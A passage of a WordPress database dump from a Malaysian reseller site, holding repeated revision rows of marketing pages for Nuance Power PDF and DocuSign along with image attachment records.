solution</p><p>Combine, edit, assemble, fill forms and share PDF files</p><p>Scan paper to PDF and create Searchable PDF files</p><p>Easy-to-use Office-style interface with clear and accessible tools</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-advanced3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Advanced</h3><h4>For enhanced security, signing and collaboration</h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction</p><p>Sign and send PDFs for signature with DocuSignÂ®</p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network</p>		\n										<img width=\"210\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/icon-img-power-pdf.png\" alt=\"\" />											\n		<h3>Power PDF Advanced: Volume Licensing</h3><h4>Enterprise deployment with a single license to manage</h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support</p><p>Capture budget savings on licensing</p><p>Superior IT management with flexible and customizable deployment options</p><h3>Nuance</h3>\n<h3>Print, capture &amp; PDF solutions</h3>\n<h3>Gain control of your documents</h3>\nNuance document imaging solutions keep your organization\'s most vital information private.\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure</h3>\nPrint and scan securely with Nuance solutions.\n<h4>Industry compliance</h4>\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\n<h4>Seamless integration</h4>\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\n<h4>Workflow management</h4>\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\n<hr />\n<h3>A comprehensive portfolio for managing your documents</h3>\n<h4>Print management</h4>\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\n<h4>Document capture &amp; workflow</h4>\nRe-imagine your companyâ€™s document capture workflows with our intelligent solutions.\n<h4>Mobile Document Imaging</h4>\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\n<h4>PDF &amp; document conversion</h4>\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\n<h4>Cost recovery</h4>\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.\n&nbsp;\n[maxbutton id=\"1\" ]','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2019-01-03 14:40:02','2019-01-03 06:40:02','',1555,'https://bintara.com.my/blog/2019/01/03/1555-revision-v1/',0,'revision','',0),(2775,1,'2019-01-03 14:38:44','2019-01-03 06:38:44','','box-power-pdf-standard3-left-250x230-en-us','','inherit','closed','closed','','box-power-pdf-standard3-left-250x230-en-us','','','2019-01-03 14:38:44','2019-01-03 06:38:44','',1555,'https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-standard3-left-250x230-en-us.png',0,'attachment','image/png',0),(2776,1,'2019-01-03 14:39:09','2019-01-03 06:39:09','','box-power-pdf-advanced3-left-250x230-en-us','','inherit','closed','closed','','box-power-pdf-advanced3-left-250x230-en-us','','','2019-01-03 14:39:09','2019-01-03 06:39:09','',1555,'https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-advanced3-left-250x230-en-us.png',0,'attachment','image/png',0),(2777,1,'2019-01-03 14:39:31','2019-01-03 06:39:31','','icon-img-power-pdf','','inherit','closed','closed','','icon-img-power-pdf','','','2019-01-03 14:39:31','2019-01-03 06:39:31','',1555,'https://bintara.com.my/wp-content/uploads/2019/01/icon-img-power-pdf.png',0,'attachment','image/png',0),(2781,1,'2019-01-03 14:45:06','2019-01-03 06:45:06','<h2>Leading the way in PDF productivity</h2>		\n		<h3>Gain control of your PDFs</h3><p>From the leader in secure document workflows, NuanceÂ® Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, itâ€™s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.</p>https://youtu.be/KJ7-lKGvGQg		\n			<h3>The right PDF solution for every need</h3>		\n		<h3>Create and convert</h3><p>Power PDF is the fastest, most accurate PDF solution available.<br />It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats â€“ even those with columns, tables and graphics.</p><h3>Edit and combine</h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br />Assemble and organize PDFs with intuitive drag-and-drop tools.</p><h3>Sign and collaborate</h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br />It offers integrated DocuSignÂ® capabilities, fillable forms, and real-time local network collaboration.</p><h4>There are many options today, but only one makes sense: Nuance Power PDF</h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctlyâ€”at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-standard3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Standard</h3><h4>Fast and accurate conversion and editing</h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution</p><p>Combine, edit, assemble, fill forms and share PDF files</p><p>Scan paper to PDF and create Searchable PDF files</p><p>Easy-to-use Office-style interface with clear and accessible tools</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-advanced3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Advanced</h3><h4>For enhanced security, signing and collaboration</h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction</p><p>Sign and send PDFs for signature with DocuSignÂ®</p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network</p>		\n										<img width=\"210\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/icon-img-power-pdf.png\" alt=\"\" />											\n		<h3>Power PDF Advanced: Volume Licensing</h3><h4>Enterprise deployment with a single license to manage</h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support</p><p>Capture budget savings on licensing</p><p>Superior IT management with flexible and customizable deployment options</p>','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2019-01-03 14:45:06','2019-01-03 06:45:06','',1555,'https://bintara.com.my/blog/2019/01/03/1555-revision-v1/',0,'revision','',0),(2782,1,'2019-01-03 14:45:53','2019-01-03 06:45:53','<h2>Leading the way in PDF productivity</h2>		\n		<h3>Gain control of your PDFs</h3><p>From the leader in secure document workflows, NuanceÂ® Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, itâ€™s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.</p>https://youtu.be/KJ7-lKGvGQg		\n			<h3>The right PDF solution for every need</h3>		\n		<h3>Create and convert</h3><p>Power PDF is the fastest, most accurate PDF solution available.<br />It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats â€“ even those with columns, tables and graphics.</p><h3>Edit and combine</h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br />Assemble and organize PDFs with intuitive drag-and-drop tools.</p><h3>Sign and collaborate</h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br />It offers integrated DocuSignÂ® capabilities, fillable forms, and real-time local network collaboration.</p><h4>There are many options today, but only one makes sense: Nuance Power PDF</h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctlyâ€”at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-standard3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Standard</h3><h4>Fast and accurate conversion and editing</h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution</p><p>Combine, edit, assemble, fill forms and share PDF files</p><p>Scan paper to PDF and create Searchable PDF files</p><p>Easy-to-use Office-style interface with clear and accessible tools</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-advanced3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Advanced</h3><h4>For enhanced security, signing and collaboration</h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction</p><p>Sign and send PDFs for signature with DocuSignÂ®</p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network</p>		\n										<img width=\"210\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/icon-img-power-pdf.png\" alt=\"\" />											\n		<h3>Power PDF Advanced: Volume Licensing</h3><h4>Enterprise deployment with a single license to manage</h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support</p><p>Capture budget savings on licensing</p><p>Superior IT management with flexible and customizable deployment options</p>','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2019-01-03 14:45:53','2019-01-03 06:45:53','',1555,'https://bintara.com.my/blog/2019/01/03/1555-revision-v1/',0,'revision','',0),(2783,1,'2019-01-03 14:47:54','2019-01-03 06:47:54','<h2>Leading the way in PDF productivity</h2>		\n		<h3>Gain control of your PDFs</h3><p>From the leader in secure document workflows, NuanceÂ® Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, itâ€™s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.</p>https://youtu.be/KJ7-lKGvGQg		\n			<h3>The right PDF solution for every need</h3>		\n		<h3>Create and convert</h3><p>Power PDF is the fastest, most accurate PDF solution available.<br />It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats â€“ even those with columns, tables and graphics.</p><h3>Edit and combine</h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br />Assemble and organize PDFs with intuitive drag-and-drop tools.</p><h3>Sign and collaborate</h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br />It offers integrated DocuSignÂ® capabilities, fillable forms, and real-time local network collaboration.</p><h4>There are many options today, but only one makes sense: Nuance Power PDF</h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctlyâ€”at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-standard3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Standard</h3><h4>Fast and accurate conversion and editing</h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution</p><p>Combine, edit, assemble, fill forms and share PDF files</p><p>Scan paper to PDF and create Searchable PDF files</p><p>Easy-to-use Office-style interface with clear and accessible tools</p><p>[maxbutton id=\"1\" ]</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-advanced3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Advanced</h3><h4>For enhanced security, signing and collaboration</h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction</p><p>Sign and send PDFs for signature with DocuSignÂ®</p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network</p><p>[maxbutton id=\"1\" ]</p>		\n										<img width=\"210\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/icon-img-power-pdf.png\" alt=\"\" />											\n		<h3>Power PDF Advanced: Volume Licensing</h3><h4>Enterprise deployment with a single license to manage</h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support</p><p>Capture budget savings on licensing</p><p>Superior IT management with flexible and customizable deployment options</p><p>[maxbutton id=\"1\" ]</p>','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2019-01-03 14:47:54','2019-01-03 06:47:54','',1555,'https://bintara.com.my/blog/2019/01/03/1555-revision-v1/',0,'revision','',0),(2797,1,'2019-01-04 10:15:06','2019-01-04 02:15:06','<h2>Get to \"yes\" faster with DocuSign electronic signatures</h2>https://youtu.be/sKoNwKcGKF0		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Sign. Send. Success.</h3><p>Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</p><h3>Modernize your System of Agreement</h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.</p>		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Delight customers with an easier way to do business</h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><p>Â </p><h3>DocuSign makes your business run better</h3><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.</p><p><strong>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</strong><br />With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p>		\n										<img width=\"438\" height=\"212\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png 438w, https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1-300x145.png 300w\" sizes=\"(max-width: 438px) 100vw, 438px\" />											\n										<img width=\"392\" height=\"184\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png 392w, https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07-300x141.png 300w\" sizes=\"(max-width: 392px) 100vw, 392px\" />											\n		<p><strong>Works with the applications, services and devices your business already uses</strong><br />DocuSign fits right into your existing systems so youâ€™ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.</p><p><strong>The reliable, globally-trusted service for electronic signatures</strong><br />Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p>		\n										<img width=\"460\" height=\"144\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png 460w, https://bintara.com.my/wp-content/uploads/2019/01/SMB-300x94.png 300w\" sizes=\"(max-width: 460px) 100vw, 460px\" />											\n		<h3>Delight your customers, partners, and employees with a better way of doing business</h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. Itâ€™s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.</p><h3>Your company\'s digital future is here</h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.</p><p>[maxbutton id=\"1\" ]</p>','DocuSign','','inherit','closed','closed','','1481-revision-v1','','','2019-01-04 10:15:06','2019-01-04 02:15:06','',1481,'https://bintara.com.my/blog/2019/01/04/1481-revision-v1/',0,'revision','',0),(2793,1,'2019-01-04 09:49:13','2019-01-04 01:49:13','<h2>Get to \"yes\" faster with DocuSign electronic signatures</h2>https://youtu.be/sKoNwKcGKF0		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Sign. Send. Success.</h3><p>Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</p><h3>Modernize your System of Agreement</h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.</p>		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Delight customers with an easier way to do business</h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><p>Â </p><h3>DocuSign makes your business run better</h3><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.</p><p><strong>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</strong><br />With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p>		\n										<img width=\"438\" height=\"212\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png 438w, https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1-300x145.png 300w\" sizes=\"(max-width: 438px) 100vw, 438px\" />											\n										<img width=\"392\" height=\"184\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png 392w, https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07-300x141.png 300w\" sizes=\"(max-width: 392px) 100vw, 392px\" />											\n		<p><strong>Works with the applications, services and devices your business already uses</strong><br />DocuSign fits right into your existing systems so youâ€™ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.</p><p><strong>The reliable, globally-trusted service for electronic signatures</strong><br />Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p>		\n										<img width=\"460\" height=\"144\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png 460w, https://bintara.com.my/wp-content/uploads/2019/01/SMB-300x94.png 300w\" sizes=\"(max-width: 460px) 100vw, 460px\" />											\n		<h3>Delight your customers, partners, and employees with a better way of doing business</h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. Itâ€™s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.</p><h3>Your company\'s digital future is here</h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.</p><h2>DocuSign</h2><h3>Grow your business.<br />Shrink your paperwork.</h3><h3>Delight customers with an easier way to do business</h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><h3><img src=\"https://www.docusign.com/sites/default/files/keybenefits-1.png\" alt=\"DocuSign signing experience in mobile device\" width=\"438\" height=\"212\" data-delta=\"1\" /></h3><h3>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</h3><p>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature,Â collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p><h3><img src=\"https://www.docusign.com/sites/default/files/smb-keybenefits-2-2_07.png\" alt=\"\" width=\"392\" height=\"184\" data-delta=\"1\" /></h3><h3>Works with the applications, services and devices your business already uses</h3><p>DocuSign fits right into your existing systems so youâ€™ll be productive, instantly.Â Use DocuSign with over 300 popular servicesÂ like Google, Salesforce and Box, orÂ access our award-winning appÂ from practically any mobile device. Works with virtually any kind of document.</p><h3><img src=\"https://www.docusign.com/sites/default/files/SMB.png\" alt=\"\" width=\"460\" height=\"144\" data-delta=\"3\" /></h3><h3>The reliable, globally-trusted service for electronic signatures</h3><p>Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p><h2>Â </h2><h3>Do more with the #1 eSignature platform for business</h3><ul><li>Simple and fast setup gets you started immediately</li><li>99.99% platform availability keeps your business running at all hours</li><li>Flexible workflows to automate any agreement or approval process</li><li>Rigorous security standards keep sensitive documents safe</li><li>Instant visibility into document status and powerful reporting</li><li>Full digital audit trail for easy compliance and legal enforceability</li></ul><p>[maxbutton id=\"1\" ]</p>Â Â ','DocuSign','','inherit','closed','closed','','1481-revision-v1','','','2019-01-04 09:49:13','2019-01-04 01:49:13','',1481,'https://bintara.com.my/blog/2019/01/04/1481-revision-v1/',0,'revision','',0),(2790,1,'2019-01-04 09:44:00','2019-01-04 01:44:00','','keybenefits-1','','inherit','closed','closed','','keybenefits-1','','','2019-01-04 09:44:00','2019-01-04 01:44:00','',1481,'https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png',0,'attachment','image/png',0),(2791,1,'2019-01-04 09:45:36','2019-01-04 01:45:36','','smb-keybenefits-2-2_07','','inherit','closed','closed','','smb-keybenefits-2-2_07','','','2019-01-04 09:45:36','2019-01-04 01:45:36','',1481,'https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png',0,'attachment','image/png',0),(2792,1,'2019-01-04 09:46:53','2019-01-04 01:46:53','','SMB','','inherit','closed','closed','','smb','','','2019-01-04 09:46:53','2019-01-04 01:46:53','',1481,'https://bintara.com.my/wp-content/uploads/2019/01/SMB.png',0,'attachment','image/png',0),(2796,1,'2019-01-04 10:14:26','2019-01-04 02:14:26','<h2>Get to \"yes\" faster with DocuSign electronic signatures</h2>https://youtu.be/sKoNwKcGKF0		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Sign. Send. Success.</h3><p>Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</p><h3>Modernize your System of Agreement</h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.</p>		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Delight customers with an easier way to do business</h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><p>Â </p><h3>DocuSign makes your business run better</h3><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.</p><p><strong>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</strong><br />With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p>		\n										<img width=\"438\" height=\"212\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png 438w, https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1-300x145.png 300w\" sizes=\"(max-width: 438px) 100vw, 438px\" />											\n										<img width=\"392\" height=\"184\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07.png 392w, https://bintara.com.my/wp-content/uploads/2019/01/smb-keybenefits-2-2_07-300x141.png 300w\" sizes=\"(max-width: 392px) 100vw, 392px\" />											\n		<p><strong>Works with the applications, services and devices your business already uses</strong><br />DocuSign fits right into your existing systems so youâ€™ll be productive, instantly. Use DocuSign with over 300 popular services like Google, Salesforce and Box, or access our award-winning app from practically any mobile device. Works with virtually any kind of document.</p><p><strong>The reliable, globally-trusted service for electronic signatures</strong><br />Hundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.</p>		\n										<img width=\"460\" height=\"144\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/SMB.png 460w, https://bintara.com.my/wp-content/uploads/2019/01/SMB-300x94.png 300w\" sizes=\"(max-width: 460px) 100vw, 460px\" />											\n		<h3>Delight your customers, partners, and employees with a better way of doing business</h3><p>DocuSign allows you to quickly and securely make every agreement and approval digital, from almost anywhere in the world, on practically any device. Itâ€™s simple to use and implement, so even complex workflows can be quickly automated, keeping your business moving forward, faster.</p><h3>Your company\'s digital future is here</h3><p>DocuSign eliminates paper and automates the agreement process, allowing companies to measure turnaround time in minutes rather than days.</p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<p>[maxbutton id=\"1\" ]</p>','DocuSign','','inherit','closed','closed','','1481-revision-v1','','','2019-01-04 10:14:26','2019-01-04 02:14:26','',1481,'https://bintara.com.my/blog/2019/01/04/1481-revision-v1/',0,'revision','',0),(2795,1,'2019-01-04 10:12:50','2019-01-04 02:12:50','<h2>Get to \"yes\" faster with DocuSign electronic signatures</h2>https://youtu.be/sKoNwKcGKF0		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_1_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Sign. Send. Success.</h3><p>Use DocuSign to complete approvals and agreements in minutes or hoursâ€”not daysâ€”from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.</p><h3>Modernize your System of Agreement</h3><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSignâ€™s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignatureÂ® but also the many options of a System of Agreement Platform.</p>		\n										<img width=\"720\" height=\"428\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2.png 720w, https://bintara.com.my/wp-content/uploads/2019/01/product_shot_2_2-300x178.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n		<h3>Delight customers with an easier way to do business</h3><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.</p><p>Â </p><h3>DocuSign makes your business run better</h3><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.</p><p><strong>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</strong><br />With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.</p>		\n										<img width=\"438\" height=\"212\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1.png 438w, https://bintara.com.my/wp-content/uploads/2019/01/keybenefits-1-300x145.png 300w\" 